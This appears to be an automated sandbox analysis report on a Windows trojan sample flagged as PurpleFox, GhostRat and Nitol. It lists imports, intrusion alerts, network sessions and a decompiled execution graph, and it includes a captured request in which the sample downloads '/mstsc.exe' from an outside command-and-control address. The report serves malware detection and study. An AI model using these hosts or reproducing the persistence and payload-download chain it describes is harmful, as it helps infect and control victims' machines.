SetWindowPlacement, GetWindowPlacement, ReuseDDElParam, UnpackDDElParam, DestroyIcon, GetDlgItem, GetWindowTextLengthA, LoadImageA, GetClipboardFormatNameA, GetSystemMetrics, OffsetRect, GetMenuItemID, GetWindowTextA, GetKeyState, DestroyWindow, GetDlgCtrlID, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, SetPropA, UnhookWindowsHookEx, GetPropA, CallWindowProcA, RemovePropA, DefWindowProcA, SetMenu, GetMenu, CreateMenu, CreatePopupMenu, DeleteMenu, CheckMenuItem, EnableMenuItem, SetMenuDefaultItem, GetMenuDefaultItem, GetMenuItemInfoA, InsertMenuItemA, ModifyMenuA, LoadMenuA, LoadMenuW, GetMessageTime, GetMessagePos, IsWindow, SetWindowLongA, SetWindowPos, MessageBoxA, GetWindowLongA, GetParent, GetLastActivePopup, IsWindowEnabled, LoadAcceleratorsA, TranslateAcceleratorA, BeginPaint, ReleaseCapture, InsertMenuA, SubtractRect, UnionRect, IntersectRect, InflateRect, SetRect, AppendMenuA, GetMenuStringA, GetMenuState, GetSubMenu, GetMenuItemCount, IsMenu, RemoveMenu, SendMessageA, GetWindowThreadProcessId, EnableWindow, RealChildWindowFromPoint, SystemParametersInfoA, GetAsyncKeyState, SetRectEmpty, CopyAcceleratorTableA, EnumDisplayMonitors, SetLayeredWindowAttributes, LoadAcceleratorsW, WaitMessage, CharUpperA, MessageBeep, GetKeyNameTextA, MapVirtualKeyA, UnregisterClassA, GetIconInfo, CopyImage, DrawIconEx, RegisterClipboardFormatA, DestroyAcceleratorTable, CreateAcceleratorTableA, ToAsciiEx, GetKeyboardLayout, GetKeyboardState, SetCursorPos, SetClassLongA, IsCharLowerA, MapVirtualKeyExA, MonitorFromPoint, UpdateLayeredWindow, DestroyCursor, GetDoubleClickTime, IsClipboardFormatAvailable, DefMDIChildProcA, TranslateMDISysAccel, DefFrameProcA, CharUpperBuffA, IsRectEmpty, CopyIcon, PtInRect, EmptyClipboard, CloseClipboard, SetClipboardData, LoadImageW, IsIconic
                              GDI32.dllCreatePalette, GetPaletteEntries, SetPaletteEntries, GetNearestPaletteIndex, CreateRectRgn, CreateRectRgnIndirect, CreateEllipticRgn, CreatePolygonRgn, CreateRoundRectRgn, SetRectRgn, CombineRgn, OffsetRgn, GetRgnBox, PtInRegion, CreateCompatibleDC, SelectObject, RealizePalette, GetBkColor, GetTextColor, GetMapMode, GetViewportOrgEx, GetViewportExtEx, GetWindowOrgEx, GetWindowExtEx, DPtoLP, LPtoDP, FillRgn, FrameRgn, PtVisible, RectVisible, Polyline, Ellipse, Polygon, Rectangle, PatBlt, BitBlt, StretchBlt, GetPixel, SetPixel, ExtFloodFill, TextOutA, GetTextExtentPoint32A, GetTextFaceA, GetTextMetricsA, Escape, GetBoundsRect, SetPixelV, DeleteDC, SaveDC, RestoreDC, SelectPalette, SetBkMode, SetPolyFillMode, SetROP2, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, OffsetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetClipBox, SelectClipRgn, ExcludeClipRect, IntersectClipRect, MoveToEx, LineTo, SetTextAlign, GetLayout, SetLayout, CreateCompatibleBitmap, DeleteObject, ExtSelectClipRgn, CreateFontIndirectA, CreatePatternBrush, CreateHatchBrush, CreateSolidBrush, CreatePen, GetObjectType, GetStockObject, CreateBitmap, ExtTextOutA, CopyMetaFileA, GetObjectA, SetBkColor, SetTextColor, GetDeviceCaps, SetDIBColorTable, CreateDIBSection, EnumFontFamiliesExA, GetSystemPaletteEntries, CreateDIBitmap, GetTextCharsetInfo, EnumFontFamiliesA, CreateDCA
                              MSIMG32.dllAlphaBlend, TransparentBlt
                              COMDLG32.dllGetFileTitleA
                              WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter
                              ADVAPI32.dllRegDeleteKeyA, RevertToSelf, RegCloseKey, RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegSetValueExA, RegDeleteValueA, RegQueryValueA, RegEnumKeyA, RegEnumValueA, RegEnumKeyExA, SetThreadToken, OpenThreadToken
                              SHELL32.dllDragFinish, DragQueryFileA, SHGetFileInfoA, SHAppBarMessage, SHBrowseForFolderA, ShellExecuteA, SHGetPathFromIDListA, SHGetSpecialFolderLocation, SHGetDesktopFolder
                              COMCTL32.dllImageList_GetIconSize
                              SHLWAPI.dllPathFindFileNameA, PathRemoveFileSpecW, PathIsUNCA, PathFindExtensionA, PathStripToRootA
                              ole32.dllOleLockRunning, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, DoDragDrop, OleFlushClipboard, OleIsCurrentClipboard, CoRegisterMessageFilter, CreateStreamOnHGlobal, CoRevokeClassObject, CoFreeUnusedLibraries, OleUninitialize, OleInitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CoLockObjectExternal, OleGetClipboard, CoUninitialize, OleRun, CoCreateInstance, CoInitializeEx, StringFromGUID2, CoCreateGuid, RegisterDragDrop, ReleaseStgMedium, CoTaskMemAlloc, StringFromCLSID, RevokeDragDrop, CoTaskMemFree, OleDuplicateData, CoInitialize, CLSIDFromString, CLSIDFromProgID
                              OLEAUT32.dllSysStringLen, SysAllocStringLen, OleCreateFontIndirect, VariantChangeType, VariantClear, SafeArrayDestroy, VarBstrFromDate, VariantTimeToSystemTime, SystemTimeToVariantTime, VariantCopy, SysAllocString, VariantInit, GetErrorInfo, SysFreeString, SysStringByteLen, SysAllocStringByteLen
                              oledlg.dll
                              OLEACC.dllLresultFromObject, CreateStdAccessibleObject, AccessibleObjectFromWindow
                              gdiplus.dllGdipCreateBitmapFromStream, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipGetImagePalette, GdipGetImagePaletteSize, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipDrawImageI, GdipGetImageGraphicsContext, GdiplusStartup, GdipCreateBitmapFromHBITMAP, GdipAlloc, GdipCloneImage, GdipFree, GdipDisposeImage, GdipDrawImageRectI, GdipSetInterpolationMode, GdipDeleteGraphics, GdipCreateFromHDC, GdiplusShutdown, GdipCreateBitmapFromStreamICM
                              IMM32.dllImmGetOpenStatus, ImmGetContext, ImmReleaseContext
                              WINMM.dllPlaySoundA
                              Language of compilation systemCountry where language is spokenMap
                              ChineseChina
                              EnglishUnited States
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-09-27T08:34:41.654689+02002851179ETPRO MALWARE PurpleFox Backdoor/Rootkit Checkin M21192.168.2.549729119.91.152.1518972TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Sep 27, 2024 08:34:18.865190029 CEST497249652192.168.2.5114.132.64.209
                              Sep 27, 2024 08:34:18.870155096 CEST965249724114.132.64.209192.168.2.5
                              Sep 27, 2024 08:34:18.870260954 CEST497249652192.168.2.5114.132.64.209
                              Sep 27, 2024 08:34:18.874973059 CEST497249652192.168.2.5114.132.64.209
                              Sep 27, 2024 08:34:18.879906893 CEST965249724114.132.64.209192.168.2.5
                              Sep 27, 2024 08:34:40.250286102 CEST965249724114.132.64.209192.168.2.5
                              Sep 27, 2024 08:34:40.250356913 CEST497249652192.168.2.5114.132.64.209
                              Sep 27, 2024 08:34:40.250489950 CEST497249652192.168.2.5114.132.64.209
                              Sep 27, 2024 08:34:40.255230904 CEST965249724114.132.64.209192.168.2.5
                              Sep 27, 2024 08:34:41.277992010 CEST497298972192.168.2.5119.91.152.151
                              Sep 27, 2024 08:34:41.282910109 CEST897249729119.91.152.151192.168.2.5
                              Sep 27, 2024 08:34:41.283010006 CEST497298972192.168.2.5119.91.152.151
                              Sep 27, 2024 08:34:41.654689074 CEST497298972192.168.2.5119.91.152.151
                              Sep 27, 2024 08:34:41.659523010 CEST897249729119.91.152.151192.168.2.5
                              Sep 27, 2024 08:35:08.221357107 CEST897249729119.91.152.151192.168.2.5
                              Sep 27, 2024 08:35:08.273600101 CEST497298972192.168.2.5119.91.152.151
                              Sep 27, 2024 08:36:08.921771049 CEST897249729119.91.152.151192.168.2.5
                              Sep 27, 2024 08:36:08.976766109 CEST497298972192.168.2.5119.91.152.151
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Sep 27, 2024 08:34:14.145798922 CEST1.1.1.1192.168.2.50xc975No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Sep 27, 2024 08:34:14.145798922 CEST1.1.1.1192.168.2.50xc975No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                              Sep 27, 2024 08:34:15.302983999 CEST1.1.1.1192.168.2.50x3f9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                              Sep 27, 2024 08:34:15.302983999 CEST1.1.1.1192.168.2.50x3f9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                              • 114.132.64.209:9652
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.549724114.132.64.20996525680C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 08:34:18.874973059 CEST287OUTGET /mstsc.exe HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                              Host: 114.132.64.209:9652
                              Connection: Keep-Alive


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Target ID:0
                              Start time:02:34:17
                              Start date:27/09/2024
                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe"
                              Imagebase:0x6d0000
                              File size:4'907'008 bytes
                              MD5 hash:D46EB1527289A7937A29B51C5152C211
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Reset < >

                                Execution Graph

                                Execution Coverage:4.2%
                                Dynamic/Decrypted Code Coverage:65%
                                Signature Coverage:13.9%
                                Total number of Nodes:914
                                Total number of Limit Nodes:45
                                execution_graph 43597 702440 43603 7206d0 43597->43603 43600 7024a4 LoadLibraryW 43614 7024c6 43600->43614 43602 70249f 43620 720880 43603->43620 43606 7206e2 43608 72071a 43606->43608 43623 71f2e0 PeekMessageA PostQuitMessage 43606->43623 43624 6f1e50 RaiseException __CxxThrowException@8 43606->43624 43611 720723 43608->43611 43625 7208a0 9 API calls 3 library calls 43608->43625 43613 702482 ActivateActCtx 43611->43613 43626 71f2e0 PeekMessageA PostQuitMessage 43611->43626 43627 6f1e50 RaiseException __CxxThrowException@8 43611->43627 43613->43600 43613->43602 43615 7024e3 43614->43615 43616 7024d8 GetLastError 43614->43616 43617 7024ea DeactivateActCtx 43615->43617 43616->43617 43618 702502 SetLastError 43617->43618 43619 70250c 43617->43619 43618->43619 43619->43602 43628 6f1e70 43620->43628 43623->43606 43624->43606 43625->43611 43626->43611 43627->43611 43634 721ec0 43628->43634 43630 6f1e88 43633 6f1ec0 43630->43633 43659 71f2e0 PeekMessageA PostQuitMessage 43630->43659 43660 6f1e50 RaiseException __CxxThrowException@8 43630->43660 43633->43606 43635 721eea 43634->43635 43638 721f1f ~_Mpunct 43635->43638 43696 71f2e0 PeekMessageA PostQuitMessage 43635->43696 43697 6f1e50 RaiseException __CxxThrowException@8 43635->43697 43639 721ff9 43638->43639 43641 721fb2 43638->43641 43650 721f58 43638->43650 43698 721570 5 API calls 3 library calls 43638->43698 43680 722070 EnterCriticalSection 43639->43680 43661 7216a0 EnterCriticalSection 43641->43661 43644 722058 43644->43630 43645 722013 43703 7219e0 57 API calls 5 library calls 43645->43703 43647 721fbd 43647->43639 43701 71f2e0 PeekMessageA PostQuitMessage 43647->43701 43702 6f1e50 RaiseException __CxxThrowException@8 43647->43702 43650->43641 43699 71f2e0 PeekMessageA PostQuitMessage 43650->43699 43700 6f1e50 RaiseException __CxxThrowException@8 43650->43700 43652 72202e 43654 722070 ~_Mpunct 7 API calls 43652->43654 43656 72203f 43654->43656 43656->43644 43704 71f2e0 PeekMessageA PostQuitMessage 43656->43704 43658 722053 43658->43644 43659->43630 43660->43630 43662 7216d2 43661->43662 43665 721751 GlobalHandle GlobalUnlock 43662->43665 43666 721735 43662->43666 43678 7217ef _memset 43662->43678 43663 721819 43667 72185a LeaveCriticalSection 43663->43667 43711 71f2e0 PeekMessageA PostQuitMessage 43663->43711 43670 6f5650 ~_Mpunct 46 API calls 43665->43670 43705 6f5650 43666->43705 43667->43647 43673 72177b GlobalReAlloc 43670->43673 43671 721855 43671->43667 43674 72178c 43673->43674 43675 7217c1 GlobalLock 43674->43675 43676 72179b GlobalHandle GlobalLock 43674->43676 43677 7217af LeaveCriticalSection 43674->43677 43675->43678 43676->43677 43709 6f1e10 RaiseException __CxxThrowException@8 43677->43709 43678->43663 43710 71f2e0 PeekMessageA PostQuitMessage 43678->43710 43681 72208e 43680->43681 43682 7220a8 43681->43682 43713 71f2e0 PeekMessageA PostQuitMessage 43681->43713 43684 7220c5 43682->43684 43714 71f2e0 PeekMessageA PostQuitMessage 43682->43714 43685 7220ea 43684->43685 43715 71f2e0 PeekMessageA PostQuitMessage 43684->43715 43692 722106 43685->43692 43716 71f2e0 PeekMessageA PostQuitMessage 43685->43716 43689 72211c LeaveCriticalSection 43691 72200a 43689->43691 43690 72212d TlsGetValue 43693 722142 43690->43693 43694 72214d LeaveCriticalSection 43690->43694 43691->43644 43691->43645 43692->43689 43692->43690 43693->43694 43695 72215e LeaveCriticalSection 43693->43695 43694->43691 43695->43691 43696->43635 43697->43635 43698->43650 43699->43650 43700->43650 43701->43647 43702->43647 43703->43652 43704->43658 43706 6f5669 ~_Mpunct 43705->43706 43707 6f567e GlobalAlloc 43706->43707 43712 6d1830 46 API calls 2 library calls 43706->43712 43707->43674 43709->43675 43710->43663 43711->43671 43713->43682 43714->43684 43715->43685 43716->43692 43717 6d8c30 43728 6d8b50 43717->43728 43721 6d8c6c 43742 6d8d00 81 API calls 43721->43742 43723 6d8c83 43743 70e580 187 API calls allocator 43723->43743 43725 6d8c9a 43744 70d9c0 81 API calls ~_Mpunct 43725->43744 43727 6d8cac 43745 6d89f0 43728->43745 43730 6d8b93 43749 6d1780 43730->43749 43734 6d8bd5 43762 10004470 8 API calls 43734->43762 43735 6d8bda 43736 6d8be4 43735->43736 43823 6d1530 VirtualFree GetProcessHeap HeapFree _com_util::ConvertBSTRToString 43735->43823 43824 8deea0 43736->43824 43739 6d8bf3 43741 715500 80 API calls Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 43739->43741 43741->43721 43742->43723 43743->43725 43744->43727 43746 6d8a46 43745->43746 43747 8deea0 ___libm_error_support 5 API calls 43746->43747 43748 6d8a6a 43747->43748 43748->43730 43832 6d15d0 43749->43832 43751 6d17a4 43752 6d1450 43751->43752 43753 6d1465 SetLastError 43752->43753 43754 6d1473 43752->43754 43753->43734 43755 6d151f SetLastError 43754->43755 43756 6d1494 43754->43756 43755->43734 43757 6d14f9 SetLastError 43756->43757 43759 6d14e9 43756->43759 43760 6d14d8 SetLastError 43756->43760 44105 8dd260 21 API calls 3 library calls 43756->44105 43757->43734 43759->43757 43761 6d150a 43759->43761 43760->43734 43761->43734 43763 1000450a GetVersionExA LoadLibraryW 43762->43763 43764 1000491d _memset 43762->43764 43765 10004566 43763->43765 43766 1000452e GetProcAddress 43763->43766 44106 100091c1 43764->44106 43769 100045ac 43765->43769 43771 10004578 43765->43771 43767 1000453e 43766->43767 43768 1000455f FreeLibrary 43766->43768 43767->43768 43768->43765 43772 10004740 43769->43772 43773 100045b9 43769->43773 43777 100078e0 278 API calls 43771->43777 43776 100049eb 43772->43776 43780 100056f0 14 API calls 43772->43780 44135 10003ed0 RegOpenKeyExA _memset 43773->44135 43776->43735 43781 1000458e WaitForSingleObject CloseHandle 43777->43781 43778 100045be 43782 100045c2 Sleep StartServiceCtrlDispatcherA Sleep StartServiceCtrlDispatcherA 43778->43782 43783 100045fd ExpandEnvironmentStringsA wsprintfA 43778->43783 43785 10004757 43780->43785 43786 100045a3 Sleep 43781->43786 43787 1000470d 43782->43787 43803 10004640 GetModuleFileNameA CopyFileA 43783->43803 43790 100035d0 16 API calls 43785->43790 43786->43786 43791 100078e0 278 API calls 43787->43791 43788 100049b4 44132 100078e0 CreateEventA 43788->44132 43789 1000499b 44122 100056f0 43789->44122 43794 10004761 _memset 43790->43794 43795 10004723 WaitForSingleObject CloseHandle ExitProcess 43791->43795 43800 1000477b SHGetSpecialFolderPathA 43794->43800 43797 100049cd WaitForSingleObject CloseHandle 43799 100049e2 Sleep 43797->43799 43799->43799 43801 100047ab _memset 43800->43801 43802 100091c1 _sprintf 102 API calls 43801->43802 43804 100047d6 GetFileAttributesA 43802->43804 44136 10003b50 97 API calls 2 library calls 43803->44136 43805 100048ea 43804->43805 43806 100047ef GetModuleFileNameA 43804->43806 43809 100048f0 Sleep 43805->43809 43808 100091c1 _sprintf 102 API calls 43806->43808 43811 1000483e DefineDosDeviceA Sleep CopyFileA SetFileAttributesA 43808->43811 43812 100078e0 278 API calls 43809->43812 43815 100091c1 _sprintf 102 API calls 43811->43815 43816 1000490a WaitForSingleObject CloseHandle 43812->43816 43813 100046e6 43814 100056f0 14 API calls 43813->43814 43817 100046f5 43814->43817 43818 100048bf ShellExecuteA 43815->43818 43816->43809 43819 100035d0 16 API calls 43817->43819 44137 10004310 13 API calls _memset 43818->44137 43821 100046ff Sleep 43819->43821 43821->43787 43822 100048e2 ExitProcess 43823->43736 43825 8deea8 43824->43825 43826 8deeaa IsDebuggerPresent 43824->43826 43825->43739 44574 8f8190 43826->44574 43829 8f101f SetUnhandledExceptionFilter UnhandledExceptionFilter 43830 8f103e __call_reportfault 43829->43830 43831 8f1048 GetCurrentProcess TerminateProcess 43829->43831 43830->43831 43831->43739 43833 6d15f9 43832->43833 43834 6d15e8 SetLastError 43832->43834 43835 6d1619 VirtualAlloc 43833->43835 43836 6d1607 SetLastError 43833->43836 43834->43751 43837 6d165d GetProcessHeap HeapAlloc 43835->43837 43838 6d1638 VirtualAlloc 43835->43838 43836->43751 43840 6d167d SetLastError VirtualFree 43837->43840 43841 6d16a3 VirtualAlloc 43837->43841 43838->43837 43839 6d164c SetLastError 43838->43839 43839->43751 43840->43751 43842 6d16ea _memmove 43841->43842 43856 6d1000 43842->43856 43845 6d1700 43862 6d1270 43845->43862 43846 6d1721 43847 6d175b 43846->43847 43875 6d10c0 43846->43875 43886 6d1530 VirtualFree GetProcessHeap HeapFree _com_util::ConvertBSTRToString 43847->43886 43850 6d1761 43850->43751 43851 6d176d 43851->43751 43852 6d172c 43852->43851 43880 100096e5 43852->43880 43854 6d1750 SetLastError 43854->43847 43859 6d1029 _memmove 43856->43859 43861 6d10b0 43856->43861 43857 6d1068 VirtualAlloc 43857->43859 43858 6d103f VirtualAlloc 43860 6d1066 _memset 43858->43860 43859->43857 43859->43858 43859->43861 43860->43859 43861->43845 43863 6d13e1 43862->43863 43864 6d1291 IsBadReadPtr 43862->43864 43863->43846 43865 6d13e8 43864->43865 43868 6d12ae 43864->43868 43865->43846 43866 6d13b4 SetLastError 43866->43846 43868->43865 43868->43866 43869 6d13c4 SetLastError 43868->43869 43871 6d1369 IsBadReadPtr 43868->43871 43872 6d1384 SetLastError 43868->43872 43887 6d1400 LoadLibraryA 43868->43887 43889 8dcef0 48 API calls __realloc_dbg 43868->43889 43869->43846 43871->43865 43871->43868 43872->43846 43876 6d1193 43875->43876 43878 6d10e8 43875->43878 43876->43852 43877 6d110e VirtualFree 43877->43878 43878->43876 43878->43877 43879 6d116b VirtualProtect 43878->43879 43879->43878 43881 100096f0 43880->43881 43882 100096f5 43880->43882 43898 1000f923 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 43881->43898 43890 100095ef 43882->43890 43885 6d174c 43885->43851 43885->43854 43886->43850 43888 6d1411 43887->43888 43888->43868 43889->43868 43891 100095fb __close 43890->43891 43892 10009698 __close 43891->43892 43895 10009648 ___DllMainCRTStartup 43891->43895 43899 1000948b 43891->43899 43892->43885 43894 10009678 43894->43892 43896 1000948b __CRT_INIT@12 149 API calls 43894->43896 43895->43892 43895->43894 43897 1000948b __CRT_INIT@12 149 API calls 43895->43897 43896->43892 43897->43894 43898->43882 43900 10009497 __close 43899->43900 43901 10009519 43900->43901 43902 1000949f 43900->43902 43904 1000957a 43901->43904 43905 1000951f 43901->43905 43952 1000c5be HeapCreate 43902->43952 43906 100095d8 43904->43906 43907 1000957f 43904->43907 43910 1000953d 43905->43910 43918 100094a8 __close 43905->43918 43998 10008639 66 API calls _doexit 43905->43998 43906->43918 44026 1000b455 79 API calls __freefls@4 43906->44026 44003 1000b151 TlsGetValue 43907->44003 43908 100094a4 43908->43918 43953 1000b4c3 GetModuleHandleW 43908->43953 43915 10009551 43910->43915 43999 1000f161 67 API calls _free 43910->43999 44002 10009564 70 API calls __mtterm 43915->44002 43918->43895 43920 100094b4 __RTC_Initialize 43927 100094c4 GetCommandLineA 43920->43927 43943 100094b8 43920->43943 43921 10009547 44000 1000b1a2 70 API calls _free 43921->44000 43925 1000959c DecodePointer 43928 100095b1 43925->43928 43926 1000954c 44001 1000c5dc HeapDestroy 43926->44001 43978 1000f88c GetEnvironmentStringsW 43927->43978 43931 100095b5 43928->43931 43932 100095cc 43928->43932 44012 1000b1df 43931->44012 44025 100086f6 66 API calls 2 library calls 43932->44025 43937 100095bc GetCurrentThreadId 43937->43918 43938 100094de 43939 100094e2 43938->43939 43940 100094e9 43938->43940 43993 1000b1a2 70 API calls _free 43939->43993 43994 1000f7d1 95 API calls 3 library calls 43940->43994 43991 1000c5dc HeapDestroy 43943->43991 43944 100094ee 43945 10009502 43944->43945 43995 1000f55b 94 API calls 6 library calls 43944->43995 43951 10009507 43945->43951 43997 1000f161 67 API calls _free 43945->43997 43948 100094f7 43948->43945 43996 10008436 77 API calls 4 library calls 43948->43996 43949 10009517 43949->43939 43951->43918 43952->43908 43954 1000b4e0 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 43953->43954 43955 1000b4d7 43953->43955 43959 1000b52a TlsAlloc 43954->43959 44027 1000b1a2 70 API calls _free 43955->44027 43957 1000b4dc 43957->43920 43960 1000b578 TlsSetValue 43959->43960 43961 1000b639 43959->43961 43960->43961 43962 1000b589 43960->43962 43961->43920 44028 100083df EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 43962->44028 43964 1000b58e EncodePointer EncodePointer EncodePointer EncodePointer 44029 1000b957 InitializeCriticalSectionAndSpinCount 43964->44029 43966 1000b5cd 43967 1000b5d1 DecodePointer 43966->43967 43968 1000b634 43966->43968 43970 1000b5e6 43967->43970 44030 1000b1a2 70 API calls _free 43968->44030 43970->43968 43971 1000f4c1 __calloc_crt 66 API calls 43970->43971 43972 1000b5fc 43971->43972 43972->43968 43973 1000b604 DecodePointer 43972->43973 43974 1000b615 43973->43974 43974->43968 43975 1000b619 43974->43975 43976 1000b1df __CRT_INIT@12 66 API calls 43975->43976 43977 1000b621 GetCurrentThreadId 43976->43977 43977->43961 43980 1000f8a8 43978->43980 43983 100094d4 43978->43983 43979 1000f8bd WideCharToMultiByte 43981 1000f915 FreeEnvironmentStringsW 43979->43981 43982 1000f8dd 43979->43982 43980->43979 43980->43980 43981->43983 44031 1000f47c 43982->44031 43992 1000ef1c 73 API calls __calloc_crt 43983->43992 43986 1000f8eb WideCharToMultiByte 43987 1000f909 FreeEnvironmentStringsA 43986->43987 43988 1000f8fd 43986->43988 43987->43983 44037 100086f6 66 API calls 2 library calls 43988->44037 43990 1000f905 43990->43987 43991->43918 43992->43938 43993->43943 43994->43944 43995->43948 43996->43945 43997->43949 43998->43910 43999->43921 44000->43926 44001->43915 44002->43918 44004 10009584 44003->44004 44005 1000b166 DecodePointer TlsSetValue 44003->44005 44006 1000f4c1 44004->44006 44005->44004 44008 1000f4ca 44006->44008 44009 10009590 44008->44009 44010 1000f4e8 Sleep 44008->44010 44064 10011c41 44008->44064 44009->43918 44009->43925 44011 1000f4fd 44010->44011 44011->44008 44011->44009 44075 1000c0f0 44012->44075 44014 1000b1eb GetModuleHandleW 44076 1000bad1 44014->44076 44016 1000b229 InterlockedIncrement 44083 1000b281 44016->44083 44019 1000bad1 __lock 64 API calls 44020 1000b24a 44019->44020 44086 1000ccd4 InterlockedIncrement 44020->44086 44022 1000b268 44098 1000b28a 44022->44098 44024 1000b275 __close 44024->43937 44025->43918 44026->43918 44027->43957 44028->43964 44029->43966 44030->43961 44033 1000f485 44031->44033 44034 1000f4bb 44033->44034 44035 1000f49c Sleep 44033->44035 44038 10008730 44033->44038 44034->43981 44034->43986 44036 1000f4b1 44035->44036 44036->44033 44036->44034 44037->43990 44039 100087ad 44038->44039 44040 1000873e 44038->44040 44062 1000b875 DecodePointer 44039->44062 44054 10008749 44040->44054 44042 100087b3 44063 1000bf03 66 API calls __getptd_noexit 44042->44063 44045 1000876c HeapAlloc 44046 100087a5 44045->44046 44045->44054 44047 100087b9 44046->44047 44047->44033 44049 10008799 44060 1000bf03 66 API calls __getptd_noexit 44049->44060 44053 10008797 44061 1000bf03 66 API calls __getptd_noexit 44053->44061 44054->44040 44054->44045 44054->44049 44054->44053 44056 1000c4b4 66 API calls 2 library calls 44054->44056 44057 1000c305 66 API calls 7 library calls 44054->44057 44058 100083b5 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 44054->44058 44059 1000b875 DecodePointer 44054->44059 44056->44054 44057->44054 44059->44054 44060->44053 44061->44046 44062->44042 44063->44047 44065 10011c4d 44064->44065 44070 10011c68 44064->44070 44066 10011c59 44065->44066 44065->44070 44073 1000bf03 66 API calls __getptd_noexit 44066->44073 44068 10011c7b HeapAlloc 44069 10011ca2 44068->44069 44068->44070 44069->44008 44070->44068 44070->44069 44074 1000b875 DecodePointer 44070->44074 44071 10011c5e 44071->44008 44073->44071 44074->44070 44075->44014 44077 1000bae6 44076->44077 44078 1000baf9 EnterCriticalSection 44076->44078 44101 1000ba0f 66 API calls 7 library calls 44077->44101 44078->44016 44080 1000baec 44080->44078 44102 10008648 66 API calls 3 library calls 44080->44102 44103 1000b9f8 LeaveCriticalSection 44083->44103 44085 1000b243 44085->44019 44087 1000ccf2 InterlockedIncrement 44086->44087 44088 1000ccf5 44086->44088 44087->44088 44089 1000cd02 44088->44089 44090 1000ccff InterlockedIncrement 44088->44090 44091 1000cd0c InterlockedIncrement 44089->44091 44092 1000cd0f 44089->44092 44090->44089 44091->44092 44093 1000cd19 InterlockedIncrement 44092->44093 44094 1000cd1c 44092->44094 44093->44094 44095 1000cd35 InterlockedIncrement 44094->44095 44096 1000cd45 InterlockedIncrement 44094->44096 44097 1000cd50 InterlockedIncrement 44094->44097 44095->44094 44096->44094 44097->44022 44104 1000b9f8 LeaveCriticalSection 44098->44104 44100 1000b291 44100->44024 44101->44080 44103->44085 44104->44100 44105->43756 44107 100091f4 44106->44107 44108 100091df 44106->44108 44107->44108 44110 100091fb 44107->44110 44138 1000bf03 66 API calls __getptd_noexit 44108->44138 44140 1000de71 102 API calls 12 library calls 44110->44140 44111 100091e4 44139 1000beb1 11 API calls __close 44111->44139 44114 10009221 44115 10004954 44114->44115 44141 1000dc66 97 API calls 5 library calls 44114->44141 44117 10002880 44115->44117 44118 1000289a _memset 44117->44118 44119 100028ad wsprintfA 44118->44119 44142 100073f0 44119->44142 44155 10005610 44122->44155 44125 100035d0 44126 10008310 _memset 44125->44126 44127 100035f5 wsprintfA GetLocalTime 44126->44127 44128 10008310 _memset 44127->44128 44129 10003676 wsprintfA lstrlenA 44128->44129 44130 100076b0 12 API calls 44129->44130 44131 100036fa 44130->44131 44131->43788 44171 100093eb 44132->44171 44135->43778 44136->43813 44137->43822 44138->44111 44139->44115 44140->44114 44141->44115 44143 10007430 _memset 44142->44143 44144 10007443 7 API calls 44143->44144 44145 100074b9 44144->44145 44146 100074ad 44144->44146 44145->44146 44147 100074d7 RegQueryValueExA 44145->44147 44151 1000759a 44145->44151 44154 10007517 44145->44154 44148 10002922 lstrlenA 44146->44148 44149 1000761b FreeLibrary 44146->44149 44147->44146 44150 10007501 lstrcpyA 44147->44150 44148->43788 44148->43789 44149->44148 44150->44146 44151->44146 44152 100075fb wsprintfA 44151->44152 44152->44146 44153 10007587 lstrcpyA 44153->44146 44154->44146 